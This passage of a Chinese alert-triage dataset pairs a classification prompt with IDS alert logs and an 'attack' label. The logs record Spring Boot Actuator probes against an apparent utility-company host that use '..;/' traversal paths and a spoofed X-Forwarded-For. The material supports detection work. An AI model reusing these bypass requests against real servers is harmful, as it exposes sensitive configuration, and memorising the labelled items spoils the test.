\"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732689395", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "539", "h_proto_version": "HTTP/1.1", "uri": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "175.178.12.116", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "519", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL3l5L29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xM182KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNzYuMC4zODA5LjEwMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45LHpoLUNOO3E9MC44LHpoO3E9MC43DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANCkROVDogMQ0KUmVmZXJlcjogaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8NClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClgtRm9yd2FyZGVkLUZvcjogMTI3LjAuMC4xDQoNCg==", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_10b056be2df40b76760a881c403cde9e", "access_time": "2024-11-27 14:36:56", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "175.178.12.116", "dimension": "3", "url_path": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Apple/Mac\", \"os\": \"Mac OS X/10.13\", \"software\": \"Chrome/76.0.3809\", \"hw_type\": \"PC\"}}", "sport": "48412", "h_url": "/html/yy/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732689416", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732689416, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 490, "uri": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 470, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "42.194.198.71", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 58044}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:36:56", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--广东省--广州市", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "044a18a1f630318aa2c3cc3fb8683ba6", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732689395", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "490", "h_proto_version": "HTTP/1.1", "uri": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "42.194.198.71", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "470", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL2hoL29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBydjo1NC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksemgtQ047cT0wLjgsemg7cT0wLjcNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MA0KRE5UOiAxDQpSZWZlcmVyOiBodHRwczovL3d3dy5nb29nbGUuY29tLw0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KWC1Gb3J3YXJkZWQtRm9yOiAxMjcuMC4wLjENCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_57a7b19352a02e93f02fbf4a19dc5764", "access_time": "2024-11-27 14:36:56", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "42.194.198.71", "dimension": "3", "url_path": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Firefox/68.0\", \"hw_type\": \"PC\"}}", "sport": "58044", "h_url": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732689416", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732689416, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 490, "uri": "/html/cs/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 470, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "42.194.232.46", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 41836}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/cs/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:36:56", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--广东省--广州市", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "fad1170ac8744818f706021bfc4cf952", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732689395", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "490", "h_proto_version": "HTTP/1.1", "uri": "/html/cs/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "42.194.232.46", "host_md5": "82db2e880e0a0d0c3bb07f8c38a03511", "accept-encoding": "gzip, deflate", "user-agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0", "referer": "https://www.google.com/", "vlan_id": "", "vuln_type": "Spring Boot Actuator endpoints 未授权访问漏洞", "attack_type": "信息泄露", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": "470", "skyeye_id": "", "payload": {"req_header": "R0VUIC9odG1sL2NzL29hdXRoL2NvZGUvLi47Ly4uOy9hY3R1YXRvcjsuanMvLi47L2FjdHVhdG9yOy5qcyBIVFRQLzEuMQ0KSG9zdDogd3d3LmhuLnNnY2MuY29tLmNuDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBydjo1NC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzY4LjANCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjgNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjksemgtQ047cT0wLjgsemg7cT0wLjcNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MA0KRE5UOiAxDQpSZWZlcmVyOiBodHRwczovL3d3dy5nb29nbGUuY29tLw0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KWC1Gb3J3YXJkZWQtRm9yOiAxMjcuMC4wLjENCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.com.cn", "host_state": "失败", "cache-control": "max-age=0", "accept-language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_da2c3c78381862821c06835f5c4c1d14", "access_time": "2024-11-27 14:36:56", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "16160000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "42.194.232.46", "dimension": "3", "url_path": "/html/cs/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "src_mac": "00:94:a1:5e:6e:87", "file_name": "actuator;.js", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "GET /html/cs/oauth/code/..;/..;/actuator;.js/..;/actuator;.js HTTP/1.1\r\nHost: www.hn.sgcc.com.cn\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nConnection: keep-alive\r\nAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7\r\nCache-Control: max-age=0\r\nDNT: 1\r\nReferer: https://www.google.com/\r\nUpgrade-Insecure-Requests: 1\r\nX-Forwarded-For: 127.0.0.1\r\n\r\n", "req_body": "", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572211-Spring Boot Actuator endpoints 未授权访问漏洞", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Firefox/68.0\", \"hw_type\": \"PC\"}}", "sport": "41836", "h_url": "/html/cs/oauth/code/..;/..;/actuator;.js/..;/actuator;.js"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732689285", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732689285, "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 490, "uri": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dport": 80, "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "rsp_status": 0, "code_language": "", "solution": "1、开启认证授权\r\n引入spring-boot-starter-security依赖,在application.properties文件中开启security功能\r\n2、禁用Actuator接口\r\n禁用某个接口,以禁用env接口为例,则可设置如下:\r\nendpoints.env.enabled=false #禁用env接口\r\n禁用所有接口,则可设置如下:\r\nendpoints.enabled=false\r\n3、升级至安全版本。", "hit_start": 470, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "xff": "127.0.0.1", "sip": "42.194.198.71", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "public_date": "2023-05-18 16:29:09", "sport": 58044}, "detail_info": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "file_md5": "9c5b10434f807487d997c6ec9d24ecae", "rule_key": "webids", "connection": "keep-alive", "api": "www.hn.sgcc.com.cn/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "first_access_time": "2024-11-27 14:34:45", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "h_method": "GET", "sip_addr": "中国--广东省--广州市", "x-forwarded-for": "127.0.0.1", "dnt": "1", "x_forwarded_for": "127.0.0.1", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Spring Boot Actuator endpoints 未授权访问漏洞", "alarm_sip": "172.31.193.55", "skyeye_index": "", "sip_ioc_dip": "044a18a1f630318aa2c3cc3fb8683ba6", "xff": "127.0.0.1", "vuln_desc": "Spring Boot Actuator是Spring Boot提供的服务监控和管理中间件,可以监控和管理Spring Boot应用程序,进行健康检查、审计、统计和HTTP追踪等。当Spring Boot应用程序运行时会自动将多个端点(比如 \"/env\"、\"/trace\"、\"/health\"、\"/info\"等)注册到路由进程中。在Spring Boot 1.5版本之前,无需身份验证即可访问。从Spring 1.5版本开始,默认只允许访问\"/health\"和\"/info\"端点,但是此安全性通常被应用程序开发人员禁用。由于Actuator端点存在错误配置,可能导致系统存在敏感信息泄露、XXE、RCE等安全问题。\r\n对于Spring 1.x,在根下注册Actuator端点,在Spring 2.x中Actuator端点移动到\"/actuator/\"基本路径。", "attack_chain": "0x01020000", "vuln_harm": "攻击者可以利用该漏洞在未授权的情况下访问应用程序相关的敏感配置信息。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732689265", "code_language": "", "public_date": "2023-05-18 16:29:09", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "490", "h_proto_version": "HTTP/1.1", "uri": "/html/hh/oauth/code/..;/..;/actuator;.js/..;/actuator;.js", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10021633", 